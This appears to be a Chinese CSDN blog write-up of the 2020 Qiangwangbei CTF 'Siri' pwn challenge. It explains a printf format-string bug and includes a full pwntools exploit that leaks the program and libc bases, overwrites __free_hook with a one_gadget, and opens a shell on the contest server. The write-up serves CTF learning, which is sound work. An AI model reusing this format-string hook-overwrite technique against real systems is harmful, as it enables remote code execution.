2020强网杯Siri题wp

最新推荐文章于 2023-09-21 23:32:55 发布
最新推荐文章于 2023-09-21 23:32:55 发布
阅读量736 收藏
点赞数 1
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sln_1550/article/details/108210593
版权

漏洞点在sub_1212函数,printf(%s)造成格式化漏洞
在这里插入图片描述
思路是先通过格式化漏洞打印出程序基址和LIBC基址,然后修改free_hook为onegadget,再打印大量数据即可
在这里插入图片描述
最终的exp如下:

#coding:utf8
from pwn import *
#context.log_level = "debug"
x=0
while(1):
#  p = process("./Siri")
  p = remote('123.56.170.202', 12124)
  p.recvuntil(">>> ")
  p.sendline("Hey Siri!")
  p.recvuntil("What Can I do for you?")
  p.sendline("Remind me to %1$p,%2$p,%3$p,%4$p,%5$p,")
  p.recvuntil(">>> OK, I'll remind you to ")
  buf=p.recvuntil(",(nil),(nil),")
  prog_base=int(buf[2:-13],16)&0xffffffffffff000-0x2000
  log.info("prog_base @ 0x%x"%(prog_base))
  p.sendline("Hey Siri!")
  p.recvuntil("What Can I do for you?")
  p.sendline("Remind me to %83$p,%2$p,%3$p,")
  p.recvuntil(">>> OK, I'll remind you to ")
  buf=p.recvuntil(",(nil),(nil),\n")
  libc_base=(int(buf[2:-14],16)&0xffffffffffff000)-0x21000  # libc_start_main
  free_hook=libc_base+0x3ed8e8
  gadget=libc_base+0x10a45c
  log.info("libc_base @ 0x%x"%(libc_base))
  log.info("free_hook @ 0x%x"%(free_hook))
  log.info("gadget @ 0x%x"%(gadget))
  for i in range(6):
      p.sendline("Hey Siri!")
      p.recvuntil("What Can I do for you?")
      p.sendline("Remind me to %%%03dx%%15$nAAA"%((ord(p64(gadget)[i])-27+256)%256)+p64(free_hook+i))
      p.recvuntil(">>> OK, I'll remind you to ")
  p.sendline("Hey Siri!")
  p.recvuntil("What Can I do for you?")
  p.sendline("Remind me to %100000c")
  p.interactive()
  break
sln_1550
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
杯2020线上赛部分wp
qq_36495104的博客
08-30 873
WEB Funhash 参考 https://medium.com/@sbasu7241/hsctf-6-ctf-writeups-a807f0b25ae4 exp hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=ffifdyop Web辅助 这是学弟做出来的@Sn0w33 1.php反序列化时,S会把binary string当做字符 2.__wakeup()当属性个数大于实际属性个数时会跳过__wakeup() 3.字符串逃逸 五个字符\
2020Siri记录
qq_39153421的博客
03-15 761
目检查 checksec检查,保护全开。ida看下函数功能,发现sub_1212函数有格式化字符串漏洞: __int64 __fastcall sub_1212(const char *a1) { char *v2; // [rsp+18h] [rbp-128h] char s[280]; // [rsp+20h] [rbp-120h] BYREF unsigned __int64 v4; // [rsp+138h] [rbp-8h] v4 = __readfsqword(0x28u);
2020杯部分总结与复现
qwzf
08-31 3324
前言 前几天打了个两天一夜的杯比赛,整个人都快要起飞了。比赛后由于CISCN出,没时间总结,现在总结和复现一下部分杯 0x01 先锋:主动 考点:命令执行+绕过黑名单
杯-[先锋]-Siri
最新发布
m0_55906008的博客
09-21 157
hey,siri
[PWN] 杯2020siri 手撸格式化字符串 劫持hook/返回地址
LDX的博客
09-21 239
手撸格式化字符串 ,劫持__malloc_hook/__free_hook,劫持返回地址
PWN 杯2020siri
09-21
PWN 杯2020siri
HTML5仿苹果Siri动画特效
07-24
CSS3的动画(@keyframes规则)允许开发者定义一系列的样式变化,并在特定时间间隔内平滑地应用这些变化,从而创建出Siri启动时那种平滑的动画效果。例如,可能使用了动画来模拟Siri图标从屏幕底部向上滑动出现,或者...
Siri为何打不过ChatGPT
03-23
Siri太笨,根本无法与ChatGPT竞争!」 这是前苹果工程师John Burkey接受纽约时报一次采访时,对苹果语音助手Siri的评价。 他进一步表示,「Siri不可能成为像ChatGPT那样的「创意助手」,笨拙的代码使其难以添加新...
仿Siri 拾音波形效果
05-01
【标】"仿Siri拾音波形效果"所涉及的知识点主要集中在音频处理和图形渲染领域,这里我们将深入探讨这两个方面。 首先,Siri是苹果公司开发的智能语音助手,其语音反馈功能不仅包括了自然语言理解和处理,还包括了...
SIRI-WHU Data Set
07-16
**SIRI-WHU遥感图像数据集详解** SIRI-WHU Data Set是一个专门针对遥感图像分类的大型数据集,由武汉大学测绘遥感信息工程国家重点实验室(WHU)与智能信息处理研究所(SIRI)联合发布。这个数据集包含12个不同的...
【Android基础】(11)多点触摸交互处理
01-08
【Android基础】(11)多点触摸交互处理
2020杯部分WP
z4ky的博客
08-25 1393
侧防 IDA打开程序 写脚本逆向即可 str_enc = "Lx|dTUwe\IvNhCBOLqDNfW}ImFZCtiyxO\PW^ebD" str_ = [] for i in range(0,len(str_enc ), 4): str_ .append(str_enc [i+1]) str_ .append(str_enc [i+2]) str_ .append(str_enc [i+3]) str_ .append(str_enc [i]) print
第五届杯全国络安全挑战赛 目复现(有目附件,详解)
路baby的博客
07-26 5954
第五届杯全国络安全挑战赛 目复现(有目附件,详解) 目名称:签到 问卷 BlueTeaming CipherMan ISO1995 EzTime threebody 加油各位( •̀ ω •́ )y期待与君再相逢
2020杯-先锋-bank
菜鸟之路
08-25 1058
2020杯-先锋-bank bank这首先需要nc一个ip地址,发现发现返回 sha256(XXX+yhB1iPWH3ENjHhf12) == 05401c749eee0ccb5a9cfb96eae3d8909a489113066f3a0f185580ac60a18403 Give me xxx: #填对以后要填teamtoken teamtoken: #要填写一个用户名 input your name: 老密码学门槛了,要算出xxx的值。爆破完事。 然后试了一下,发现有时间限制,操作时间超过一
一周总结(2020.8.31-9.6)
BIAUTUMN的博客
09-04 413
wp Re:xx_warmup_obf (杯) 工具:idapro,idle 在init函数里有大量赋值 全部是用来混淆 调试发现,类似于这种代码后面的跳转全部是固定的调试到检测flag的函数(402968) 去掉混淆得到方程组使用Z3脚本模块得flag 脚本如下: from z3 import * s = Solver() NUM = 28 a = [0]*NUM for i in range(NUM): a[i] = Int('a['+str(i)+']') s.add(23925 *
WP|2022第六届杯青少赛线上赛WriteUp 中学生CTF 青少年CTF
zxsctf的博客
09-22 5218
这次比赛,非常感谢来自许昌学院的ZIKH26师傅的Pwn、和粥续师傅的Misc,我这次出的目不多,并且个人排名也不是很靠前。 赛前我们也做了很多次学习、夜以继日的刷,辛辛苦苦的把这次比赛的线上赛打出了一个还不错的成绩。 非常感谢能够有二位师傅的拼力以赴,才有如今的成绩。 部分目已经复现放到“青少年CTF平台”中,感兴趣的可以前去作答,不知道平台地址的可以看我们本次文章的副条或百度搜索“青少年CTF”。
第六届“杯”青少年专项赛 writewp by 楠辞姐姐后援团
JEWSWS的博客
09-11 2493
这次比赛难度很大,Crypto部分也全都是猜谜语类型的目,没啥游戏体验,不过好在排名在前30.本篇WP为团队WP,团队成员为:树木,AcexZe,Lenyi战队名称:楠辞姐姐后援团战队排名:24。
2021杯青少年专项赛-科普赛 WP
Moxin1044的博客
10-11 2782
试卷时间:2021-09-2509:00:00-2021-09-3017:00:00 试卷说明:本次考试共设置30道考,单选3分/道,多选4分/道,满分100分。请在考试规定时间内进行答,如未作答将自动提交且不会记录分数。 一、单项选择 1、以下做法错误的是?() A、进出办公场所及机房需进行登记、记录 B、办公及机房出入无需专人值守并陪同,自己去 C、重要区域配备电子门禁系统 D、办公区域及机房配备监控系统及防盗报警系统 您的答案:B标准答案:B 2、给系...
2020杯 部分wp
fly夏天的博客
08-26 1660
2020杯 部分wp 彩笔参加了这次杯,感觉又被扎心,果然是得PWN者得天下。 1. BANK 这虽然是个PWN,但是居然被我这个web小白做出来了,我感觉我这种做法是个非预期解,也不知道大佬是如何操作的。 首先,远程nc连接,提示解密拼接字符串的sha256加密。编写python脚本爆破。简易脚本如下: import hashlib,os s = 'a36MUMAX1VSQQcEHJ' #伪加密部分字符串 result = 'f8a38643f58bf7d6523d8c43f81a9329d
深度解析:Siri语音识别系统与智能架构
"iOS DevCamp幻灯片分享:Siri:I,robot! Siri语音识别系统详解 | 新浪 张俊林" 本文将详细解析Siri,苹果公司的标志性语音识别系统,它不仅是一个简单的语音识别工具,更是一个具备智能理解和执行用户意图的系统。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值